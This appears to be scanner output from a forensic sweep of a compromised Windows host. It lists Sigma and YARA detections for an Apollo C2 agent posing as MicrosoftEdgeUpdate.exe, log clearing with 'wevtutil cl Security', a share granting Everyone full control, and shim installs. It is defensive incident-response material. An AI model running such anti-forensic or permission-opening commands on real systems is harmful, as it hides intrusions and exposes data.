EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 11:42:52 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 9956 NewProcessName: C:\Windows\SysWOW64\net.exe TokenElevationType: %%1936 ProcessId: 8688 CommandLine: net share Certs=C:\Certs /grant:Everyone,full TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\SysWOW64\cmd.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.725363772041957e+09 EventRecordID: 144063 Execution_ProcessID: 4 Execution_ThreadID: 7132 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Grant Overpermissive Permissions To Files Or Shares
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2022/12/16
DESCRIPTION_1:
Detects the granting of overly permissive such as "FULL CONTROL" permissions to files or shares to groups such as "Everyone"
AUTHOR_1:
Nasreddine Bencherchali
ID_1:
0f9de3a8-ff08-433b-821a-fa241c811a36
FALSEPOSITIVES_1:
Rare FP could occur with some scripts and administrators
REASONS_COUNT:
1
|
Warning 38
|
Sep 10 12:57:02 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 11:42:52 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 5672 NewProcessName: C:\Windows\SysWOW64\net1.exe TokenElevationType: %%1936 ProcessId: 9956 CommandLine: C:\Windows\system32\net1 share Certs=C:\Certs /grant:Everyone,full TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\SysWOW64\net.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.7253637720667424e+09 EventRecordID: 144064 Execution_ProcessID: 4 Execution_ThreadID: 7844 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Grant Overpermissive Permissions To Files Or Shares
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2022/12/16
DESCRIPTION_1:
Detects the granting of overly permissive such as "FULL CONTROL" permissions to files or shares to groups such as "Everyone"
AUTHOR_1:
Nasreddine Bencherchali
ID_1:
0f9de3a8-ff08-433b-821a-fa241c811a36
FALSEPOSITIVES_1:
Rare FP could occur with some scripts and administrators
REASONS_COUNT:
1
|
Warning 39
|
Sep 10 12:57:02 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 12:01:59 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 8564 NewProcessName: C:\Windows\System32\sdbinst.exe TokenElevationType: %%1936 ProcessId: 5032 CommandLine: C:\Windows\System32\sdbinst.exe -m -bg TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\System32\svchost.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.7253649195170047e+09 EventRecordID: 144096 Execution_ProcessID: 4 Execution_ThreadID: 2020 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Suspicious Shim Database Installation via Sdbinst.EXE
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/08/01
DESCRIPTION_1:
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
AUTHOR_1:
Nasreddine Bencherchali (Nextron Systems)
ID_1:
18ee686c-38a3-4f65-9f44-48a077141f42
FALSEPOSITIVES_1:
Unknown
REASONS_COUNT:
1
|
Warning 40
|
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 13:01:59 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 3064 NewProcessName: C:\Windows\System32\sdbinst.exe TokenElevationType: %%1936 ProcessId: 5032 CommandLine: C:\Windows\System32\sdbinst.exe -m -bg TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\System32\svchost.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.7253685195597825e+09 EventRecordID: 144316 Execution_ProcessID: 4 Execution_ThreadID: 3192 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Suspicious Shim Database Installation via Sdbinst.EXE
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/08/01
DESCRIPTION_1:
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
AUTHOR_1:
Nasreddine Bencherchali (Nextron Systems)
ID_1:
18ee686c-38a3-4f65-9f44-48a077141f42
FALSEPOSITIVES_1:
Unknown
REASONS_COUNT:
1
|
Warning 41
|
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 14:01:59 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 9944 NewProcessName: C:\Windows\System32\sdbinst.exe TokenElevationType: %%1936 ProcessId: 5032 CommandLine: C:\Windows\System32\sdbinst.exe -m -bg TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\System32\svchost.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.7253721195965807e+09 EventRecordID: 144421 Execution_ProcessID: 4 Execution_ThreadID: 6508 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Suspicious Shim Database Installation via Sdbinst.EXE
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/08/01
DESCRIPTION_1:
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
AUTHOR_1:
Nasreddine Bencherchali (Nextron Systems)
ID_1:
18ee686c-38a3-4f65-9f44-48a077141f42
FALSEPOSITIVES_1:
Unknown
REASONS_COUNT:
1
|
Warning 42
|
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 15:01:59 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 3972 NewProcessName: C:\Windows\System32\sdbinst.exe TokenElevationType: %%1936 ProcessId: 5032 CommandLine: C:\Windows\System32\sdbinst.exe -m -bg TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\System32\svchost.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.7253757196591663e+09 EventRecordID: 144506 Execution_ProcessID: 4 Execution_ThreadID: 1084 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Suspicious Shim Database Installation via Sdbinst.EXE
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/08/01
DESCRIPTION_1:
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
AUTHOR_1:
Nasreddine Bencherchali (Nextron Systems)
ID_1:
18ee686c-38a3-4f65-9f44-48a077141f42
FALSEPOSITIVES_1:
Unknown
REASONS_COUNT:
1
|
Warning 43
|
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 16:01:59 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 2556 NewProcessName: C:\Windows\System32\sdbinst.exe TokenElevationType: %%1936 ProcessId: 5032 CommandLine: C:\Windows\System32\sdbinst.exe -m -bg TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\System32\svchost.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.7253793198101137e+09 EventRecordID: 144560 Execution_ProcessID: 4 Execution_ThreadID: 4600 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Suspicious Shim Database Installation via Sdbinst.EXE
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/08/01
DESCRIPTION_1:
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
AUTHOR_1:
Nasreddine Bencherchali (Nextron Systems)
ID_1:
18ee686c-38a3-4f65-9f44-48a077141f42
FALSEPOSITIVES_1:
Unknown
REASONS_COUNT:
1
|
Warning 44
|
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 17:01:59 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 6336 NewProcessName: C:\Windows\System32\sdbinst.exe TokenElevationType: %%1936 ProcessId: 5032 CommandLine: C:\Windows\System32\sdbinst.exe -m -bg TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\System32\svchost.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.7253829198586817e+09 EventRecordID: 144604 Execution_ProcessID: 4 Execution_ThreadID: 5400 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Suspicious Shim Database Installation via Sdbinst.EXE
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/08/01
DESCRIPTION_1:
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
AUTHOR_1:
Nasreddine Bencherchali (Nextron Systems)
ID_1:
18ee686c-38a3-4f65-9f44-48a077141f42
FALSEPOSITIVES_1:
Unknown
REASONS_COUNT:
1
|
Warning 45
|
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Suspicious eventlog entry found
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 3952 NewProcessName: C:\Windows\SysWOW64\cmd.exe TokenElevationType: %%1936 ProcessId: 2252 CommandLine: cmd.exe /S /c wevtutil cl Security TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\SystemTemp\MicrosoftEdgeUpdate.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.725358264763456e+09 EventRecordID: 143905 Execution_ProcessID: 4 Execution_ThreadID: 2784 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
60
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 10:11:04 2024
REASON_1:
YARA rule LOG_Win_Destructive_Activity / Detects Windows commands often used on Ransomware or sabotage attacks
SUBSCORE_1:
60
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2018-02-12
TAGS_1:
CRIME, LOG, RANSOM
RULENAME_1: LOG_Win_Destructive_Activity
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
C:\Windows\SysWOW64\cmd.exe
EXISTS_1:
yes
TYPE_1:
EXE
SIZE_1:
236032
FIRSTBYTES_1:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED_1:
Sat Jan 21 10:00:55.598 2023
OWNER_1:
NT SERVICE\TrustedInstaller
COMPANY_1:
Microsoft Corporation
DESC_1:
Windows Command Processor
LEGAL_COPYRIGHT_1:
© Microsoft Corporation. All rights reserved.
PRODUCT_1:
Microsoft® Windows® Operating System
ORIGINAL_NAME_1:
Cmd.Exe.MUI
INTERNAL_NAME_1:
cmd
IMPHASH_1:
392b4d61b1d1dadc1f06444df258188a
FILE_2:
C:\Windows\SystemTemp\MicrosoftEdgeUpdate.exe
EXISTS_2:
no
FILE_3:
E:\Windows\System32\winevt\Logs\Security.evtx
EXISTS_3:
yes
TYPE_3:
EVTX
SIZE_3:
1118208
FIRSTBYTES_3:
456c6646696c6500000000000000000000000000 / ElfFile
CREATED_3:
Tue Jun 4 02:25:39.557 2024
OWNER_3:
NT AUTHORITY\LOCAL SERVICE
|
Warning 46
|
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\System.evtx
EVENT_ID:
104
EVENT_LEVEL:
4
EVENT_CHANNEL:
System
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Mon Jul 22 15:21:45 2024
ENTRY:
SubjectUserName: Admin SubjectDomainName: PC01243 Channel: System BackupPath: ClientProcessId: 5448 ClientProcessStartKey: 3377699720529630 Provider_Name: Microsoft-Windows-Eventlog Provider_Guid: {fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148} EventID: 104 Version: 1 Level: 4 Task: 104 Opcode: 0 Keywords: 9223372036854775808 TimeCreated_SystemTime: 1.721661705973029e+09 EventRecordID: 2980 Execution_ProcessID: 2052 Execution_ThreadID: 10084 Channel: System Computer: pc01243.MercuryLark.corp Security_UserID: S-1-5-21-395486425-972718290-1458454356-1001
SCORE:
70
REASON_1:
Important Windows Eventlog Cleared
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/05/16
DESCRIPTION_1:
Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by "wevtutil cl" command execution
AUTHOR_1:
Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
ID_1:
100ef69e-3327-481c-8e5c-6d80d9507556
FALSEPOSITIVES_1:
Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog), System provisioning (system reset before the golden image creation)
REASONS_COUNT:
1
|
Warning 47
|
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\System.evtx
EVENT_ID:
104
EVENT_LEVEL:
4
EVENT_CHANNEL:
System
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Mon Jul 22 15:21:46 2024
ENTRY:
SubjectUserName: Admin SubjectDomainName: PC01243 Channel: Windows PowerShell BackupPath: ClientProcessId: 6844 ClientProcessStartKey: 3377699720529649 Provider_Name: Microsoft-Windows-Eventlog Provider_Guid: {fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148} EventID: 104 Version: 1 Level: 4 Task: 104 Opcode: 0 Keywords: 9223372036854775808 TimeCreated_SystemTime: 1.7216617065201025e+09 EventRecordID: 2983 Execution_ProcessID: 2052 Execution_ThreadID: 10084 Channel: System Computer: pc01243.MercuryLark.corp Security_UserID: S-1-5-21-395486425-972718290-1458454356-1001
SCORE:
70
REASON_1:
Important Windows Eventlog Cleared
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/05/16
DESCRIPTION_1:
Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by "wevtutil cl" command execution
AUTHOR_1:
Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
ID_1:
100ef69e-3327-481c-8e5c-6d80d9507556
FALSEPOSITIVES_1:
Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog), System provisioning (system reset before the golden image creation)
REASONS_COUNT:
1
Warning 48
Sep 10 12:57:03 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\System.evtx
EVENT_ID:
104
EVENT_LEVEL:
4
EVENT_CHANNEL:
System
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 09:15:57 2024
ENTRY:
SubjectUserName: SYSTEM SubjectDomainName: NT AUTHORITY Channel: Microsoft-Windows-Sysmon/Operational BackupPath: ClientProcessId: 7672 ClientProcessStartKey: 4785074604081616 Provider_Name: Microsoft-Windows-Eventlog Provider_Guid: {fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148} EventID: 104 Version: 1 Level: 4 Task: 104 Opcode: 0 Keywords: 9223372036854775808 TimeCreated_SystemTime: 1.7253549574365888e+09 EventRecordID: 6626 Execution_ProcessID: 2160 Execution_ThreadID: 7916 Channel: System Computer: pc01243.MercuryLark.corp Security_UserID: S-1-5-18
SCORE:
70
REASON_1:
Important Windows Eventlog Cleared
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/05/16
DESCRIPTION_1:
Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by "wevtutil cl" command execution
AUTHOR_1:
Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
ID_1:
100ef69e-3327-481c-8e5c-6d80d9507556
FALSEPOSITIVES_1:
Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog), System provisioning (system reset before the golden image creation)
REASONS_COUNT:
1
Warning 49
Sep 10 12:57:47 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
80
FILE:
E:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WindowsBackup.dll
EXT:
.dll
TYPE:
EXE
SIZE:
1872896
FIRSTBYTES:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED:
Tue Aug 13 19:55:34.134 2024
MODIFIED:
Tue Aug 13 19:55:34.166 2024
ACCESSED:
Thu Aug 29 12:16:12.473 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:R / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:R / NT SERVICE\TrustedInstaller:F
OWNER:
NT SERVICE\TrustedInstaller
COMPANY:
Microsoft Corporation
LEGAL_COPYRIGHT:
© Microsoft Corporation. All rights reserved.
PRODUCT:
Microsoft® Windows® Operating System
ORIGINAL_NAME:
WindowsBackup.dll
INTERNAL_NAME:
WindowsBackup.dll
IMPHASH:
3120c38e9c80219e9c8bb33cf385dfd1
REASON_1:
Filename IOC \WindowsBackup.dll
SUBSCORE_1:
80
REF_1:
Stealth Falcon Filename IOC https://www.welivesecurity.com/2019/09/09/backdoor-stealth-falcon-group/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
Warning 50
Sep 10 12:58:24 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
80
FILE:
E:\Windows\SystemTemp\MicrosoftEdgeUpdate.exe
EXT:
.exe
TYPE:
EXE
SIZE:
2137088
FIRSTBYTES:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED:
Tue Sep 3 09:04:51.740 2024
MODIFIED:
Tue Sep 3 09:04:51.781 2024
ACCESSED:
Tue Sep 3 13:11:25.617 2024
PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
DESC:
Ollopa
LEGAL_COPYRIGHT:
Copyright © 2021
PRODUCT:
Ollopa
ORIGINAL_NAME:
Apollo.exe
INTERNAL_NAME:
Apollo.exe
IMPHASH:
f34d5f2d4577ed6d9ceec516c1f5a744
REASON_1:
YARA rule MAL_Apollo_Agent_Oct22 / Detects Apollo Windows agent written in C# NET 4.0, often used in combination with Mythic C2
SUBSCORE_1:
80
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-10-05
TAGS_1:
EXE, MAL
RULENAME_1: MAL_Apollo_Agent_Oct22
AUTHOR_1:
Paul Hager
REASONS_COUNT:
1
Warning 51
Sep 10 13:03:51 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
75
FILE:
E:\Windows\WinSxS\amd64_microsoft-windows-host-network-service_31bf3856ad364e35_10.0.22621.3880_none_daa6f825dbd9c2c0\HostNetworkingService.psm1
EXT:
.psm1
TYPE:
UNKNOWN
SIZE:
1264
FIRSTBYTES:
444353010100000004190000e004000004190000 / DCS
CREATED:
Sat May 7 05:20:17.750 2022
MODIFIED:
Sat May 7 05:34:04.392 2022
ACCESSED:
Thu Aug 15 02:41:31.786 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:R / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:R / NT SERVICE\TrustedInstaller:F
OWNER:
BUILTIN\Administrators
REASON_1:
YARA rule SUSP_Reversed_PowerShell_Code / Detects reversed PowerShell strings
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2018-11-30
TAGS_1:
SCRIPT, SUSP, T1059_001
RULENAME_1: SUSP_Reversed_PowerShell_Code
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
Warning 52
Sep 10 13:04:45 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\Windows\WinSxS\amd64_microsoft-windows-n..diagnostics-package_31bf3856ad364e35_10.0.22621.2506_none_9d9261a7c28d6dc6\r\NetworkDiagnosticsTroubleshoot.ps1
EXT:
.ps1
TYPE:
UNKNOWN
SIZE:
616
FIRSTBYTES:
62820f93504133308016d7d5deb19d01607d0c08 / bPA30ޱ`}
CREATED:
Fri Apr 5 23:03:11.272 2024
MODIFIED:
Fri Apr 5 23:03:11.272 2024
ACCESSED:
Fri Apr 5 23:03:11.272 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:R / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:R / NT SERVICE\TrustedInstaller:F
OWNER:
NT SERVICE\TrustedInstaller
REASON_1:
YARA rule SUSP_PS1_Loader_Generic_Feb21 / Detects file that look like PowerShell loaders
SUBSCORE_1:
65
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2021-02-12
TAGS_1:
GEN, SCRIPT, SUSP, T1059_001
RULENAME_1: SUSP_PS1_Loader_Generic_Feb21
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
Warning 53
Sep 10 13:08:17 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
80
FILE:
E:\Windows\WinSxS\amd64_userexperience-desktop_31bf3856ad364e35_10.0.22621.3880_none_0c186f11e5fa3786\CBS\WindowsBackup.dll
EXT:
.dll
TYPE:
EXE
SIZE:
1860096
FIRSTBYTES:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED:
Mon Jul 22 15:18:27.144 2024
MODIFIED:
Mon Jul 22 15:18:27.176 2024
ACCESSED:
Wed Aug 21 00:33:33.135 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:R / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:R / NT SERVICE\TrustedInstaller:F
OWNER:
NT SERVICE\TrustedInstaller
COMPANY:
Microsoft Corporation
LEGAL_COPYRIGHT:
© Microsoft Corporation. All rights reserved.
PRODUCT:
Microsoft® Windows® Operating System
ORIGINAL_NAME:
WindowsBackup.dll
INTERNAL_NAME:
WindowsBackup.dll
IMPHASH:
3120c38e9c80219e9c8bb33cf385dfd1
REASON_1:
Filename IOC \WindowsBackup.dll
SUBSCORE_1:
80
REF_1:
Stealth Falcon Filename IOC https://www.welivesecurity.com/2019/09/09/backdoor-stealth-falcon-group/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
Warning 54
Sep 10 13:08:26 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
80
FILE:
E:\Windows\WinSxS\amd64_userexperience-desktop_31bf3856ad364e35_10.0.22621.3880_none_0c186f11e5fa3786\n\CBS\WindowsBackup.dll
EXT:
.dll
TYPE:
UNKNOWN
SIZE:
569461
FIRSTBYTES:
